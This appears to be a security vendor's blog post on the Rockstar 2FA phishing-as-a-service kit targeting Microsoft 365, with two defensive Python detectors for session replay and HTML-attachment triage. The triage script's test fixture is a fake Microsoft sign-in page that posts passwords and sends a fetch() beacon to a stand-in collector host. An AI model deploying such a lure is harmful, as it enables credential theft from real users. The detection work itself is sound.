Cybercriminals are escalating their attacks using a sophisticated Phishing-as-a-Service (PhaaS) toolkit called Rockstar 2FA, specifically designed to target Microsoft 365 users. Despite the presence of multi-factor authentication (MFA), attackers bypass it using Adversary-in-the-Middle (AiTM) techniques. 😱
🔎 Key Takeaway: Even with MFA enabled, organizations are vulnerable to credential theft and session hijacking via AiTM attacks.
🚨 AiTM Attacks: Rockstar 2FA intercepts user credentials and session cookies, so MFA no longer protects the account once the session has been captured.
💻 Subscription-Based PhaaS: Available for rent at $200 for two weeks or $350 per month, this toolkit enables even non-technical attackers to launch large-scale phishing campaigns.
📊 Modern Admin Panel: Offers a user-friendly interface for customizing phishing campaigns, tracking their performance, and generating malicious URLs.
🛡️ 2FA Bypass: Steals session cookies to bypass two-factor authentication.
🍪 Cookie Harvesting: Captures critical data for unauthorized access.
👾 Antibot Protection: Integrates Cloudflare Turnstile to block automated security scans.
📋 Customizable Themes: Mimics legitimate login pages (e.g., Microsoft, Google) to deceive victims.
🤖 Telegram Bot Integration: Automatically sends stolen credentials to the attacker in real time.
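The defining trace an AiTM kit leaves in sign-in telemetry is a session identifier that was minted after an MFA-satisfied sign-in from one address and then reused, minutes later, from a different address. The following script is an added example (not code from the original post or from the toolkit it describes) that runs that check over constructed sign-in records; the field names, users and IP addresses are hypothetical stand-ins for whatever your identity provider's sign-in log exports, and it also illustrates the "Monitor Login Activity" advice later on this page.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class SignIn:
    """One sign-in record. Field names are assumptions, not a real log schema."""
    ts: datetime
    user: str
    session_id: str      # stand-in for the session cookie / refresh-token identifier
    ip: str
    mfa_satisfied: bool  # did this request satisfy an MFA challenge?
    device_known: bool   # was the device registered/compliant in the directory?


# Constructed sample records (hypothetical users and RFC 5737 documentation addresses).
SAMPLE_EVENTS = [
    # alice: normal session, both uses from the same address -> no alert
    SignIn(datetime(2024, 11, 29, 9, 2), "alice@corp.example", "S-1001", "203.0.113.10", True, True),
    SignIn(datetime(2024, 11, 29, 9, 5), "alice@corp.example", "S-1001", "203.0.113.10", False, True),
    # bob: MFA satisfied from an unknown device, then the same session is used
    # two minutes later from an unrelated address -> classic AiTM replay pattern
    SignIn(datetime(2024, 11, 29, 10, 14), "bob@corp.example", "S-2002", "198.51.100.7", True, False),
    SignIn(datetime(2024, 11, 29, 10, 16), "bob@corp.example", "S-2002", "192.0.2.44", False, False),
    # carol: same session reused next morning from a different office address;
    # outside the default window, so treated as a benign network change
    SignIn(datetime(2024, 11, 29, 15, 0), "carol@corp.example", "S-3003", "203.0.113.99", True, True),
    SignIn(datetime(2024, 11, 30, 8, 0), "carol@corp.example", "S-3003", "203.0.113.12", False, True),
]


def find_session_replay(events, window=timedelta(hours=1)):
    """Flag every session identifier that is used from a second source IP within
    `window` of the sign-in that created it. Returns a list of alert dicts."""
    by_session = {}
    for e in sorted(events, key=lambda e: e.ts):
        by_session.setdefault(e.session_id, []).append(e)

    alerts = []
    for sid, evs in by_session.items():
        origin = evs[0]  # earliest use of this session is its issuing sign-in
        for later in evs[1:]:
            if later.ip != origin.ip and later.ts - origin.ts <= window:
                # An MFA-satisfied sign-in from an unregistered device whose session
                # immediately moves to another address is the highest-confidence case.
                severity = "high" if origin.mfa_satisfied and not origin.device_known else "medium"
                alerts.append({
                    "user": origin.user,
                    "session_id": sid,
                    "issued_from": origin.ip,
                    "reused_from": later.ip,
                    "minutes_between": (later.ts - origin.ts).total_seconds() / 60,
                    "severity": severity,
                })
                break  # one alert per session is enough for triage
    return alerts


if __name__ == "__main__":
    for a in find_session_replay(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['user']}: session {a['session_id']} issued from "
              f"{a['issued_from']} reused from {a['reused_from']} after {a['minutes_between']:.0f} min")
```

The window is the tuning knob: widening it catches slower replays but starts flagging legitimate address changes (the carol case above), so in practice pair it with ASN or geolocation distance rather than raw IP inequality. A confirmed hit should trigger session revocation for that user, not just a ticket, because the captured cookie stays valid until it is revoked.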
The phishing campaigns employ multiple vectors to lure victims:
🔗 URLs & QR Codes: Embedded in emails appearing as file-sharing requests or e-signature prompts.
📎 Document Attachments: Malicious .HTM files designed to mimic legitimate Microsoft 365 login forms.
🔗 Link Redirectors: Use trusted services like Google Docs Viewer, Atlassian Confluence, and Microsoft OneNote to host phishing links and bypass spam filters.
💡 Pro Tip: Always verify the URL before entering your credentials, especially for Microsoft 365 or any cloud service.
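An .HTM attachment that carries a login form is itself the indicator, whatever brand it imitates: a shared document does not need your password to open. The script below is an added example (not from the original post) of the attachment triage an email gateway can do: it parses a message, pulls out HTML attachments, and reports whether each one contains a password field and which hosts its form or scripts talk to. The sample message, the sender and collector hostnames, and the allow-list of expected sign-in hosts are all constructed for the example.

```python
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from urllib.parse import urlparse

# Hosts at which this organisation legitimately signs in (assumed allow-list).
EXPECTED_LOGIN_HOSTS = {"login.microsoftonline.com"}

# Constructed lure: a lookalike sign-in form that posts to a made-up collector host.
CONSTRUCTED_HTM = b"""<html><body>
<h2>Microsoft 365 - Sign in to view the shared document</h2>
<form id="f" action="https://collector.aitm.example/submit" method="post">
  <input name="email" type="email"><input name="passwd" type="password">
  <button>Sign in</button>
</form>
<script>document.getElementById('f').onsubmit=function(){fetch('https://collector.aitm.example/beacon')}</script>
</body></html>"""


def build_sample_email():
    """Assemble the constructed phishing email as raw bytes, as a gateway would receive it."""
    msg = EmailMessage()
    msg["From"] = "docs-share@notify.example"
    msg["To"] = "alice@corp.example"
    msg["Subject"] = "Document shared with you"
    msg.set_content("A document has been shared with you. Open the attachment to sign in and view it.")
    msg.add_attachment(CONSTRUCTED_HTM, maintype="text", subtype="html", filename="Secure_Document.htm")
    return msg.as_bytes()


URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
PASSWORD_RE = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)


def triage_html_attachments(raw):
    """Return one finding per .htm/.html attachment: does it collect a password,
    and which hosts outside the allow-list does it reference?"""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if not name.endswith((".htm", ".html")):
            continue
        html = part.get_payload(decode=True).decode("utf-8", errors="replace")
        hosts = {urlparse(u).hostname for u in URL_RE.findall(html)}
        hosts.discard(None)
        external = sorted(h for h in hosts if h not in EXPECTED_LOGIN_HOSTS)
        has_pw = bool(PASSWORD_RE.search(html))
        if has_pw and external:
            verdict = "quarantine"   # credential form submitting off the allow-list
        elif has_pw:
            verdict = "review"       # credential form with no visible destination
        else:
            verdict = "allow"
        findings.append({
            "filename": part.get_filename(),
            "has_password_field": has_pw,
            "external_hosts": external,
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in triage_html_attachments(build_sample_email()):
        print(f"{f['filename']}: password field={f['has_password_field']}, "
              f"external hosts={f['external_hosts']} -> {f['verdict']}")
```

A real gateway would also decode obfuscated JavaScript and follow the redirector links mentioned above before deciding, but even this plain check catches the common case where the form action or a fetch() call names the collector directly. Treat the "review" verdict as a hit too: a password field in an attachment that posts nowhere visible usually means the destination is assembled at runtime.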
Rockstar 2FA leverages trusted platforms to host its phishing pages, increasing the chances of bypassing security checks:
🌐 Google Docs Viewer
📂 Microsoft OneDrive & Dynamics 365
🧩 Atlassian Confluence
🔍 What Makes It Dangerous? The phishing pages are designed to replicate the official login portals of popular brands, tricking users into entering their credentials. These details are instantly sent to the attacker’s AiTM server.
A similar campaign, dubbed Beluga, uses .HTM attachments to steal Microsoft OneDrive credentials. Victims unknowingly provide their information, which is exfiltrated to a Telegram bot.
Additionally, phishing links are being disguised as betting games on social media, luring users with promises of quick financial gains, only to steal their personal and financial data.
💸 Real-World Impact: Some victims have reported losing over $10,000 to these scams.
🔒 Best Practices to Stay Safe from PhaaS Attacks:
Enable Conditional Access: Use adaptive MFA that considers device and location-based signals.
Regular Penetration Testing: Hire experts like Wire Tor to simulate attacks and identify vulnerabilities in your infrastructure.
Educate Your Team: Conduct regular training sessions on identifying phishing attempts.
Use Anti-Phishing Tools: Implement email filtering solutions that detect and block malicious links.
Monitor Login Activity: Watch for suspicious sign-ins, especially from unknown locations or devices.
At Wire Tor, we specialize in protecting organizations from Phishing-as-a-Service (PhaaS) threats and AiTM attacks. Our penetration testing services help you:
🔍 Detect vulnerabilities before attackers do.
🔒 Secure Microsoft 365 accounts against advanced phishing techniques.
⚙️ Enhance your security posture with actionable insights and recommendations.
💥 Reach Before Breach with Wire Tor!
🚨 Contact Wire Tor Pentest today and safeguard your organization from evolving cyber threats.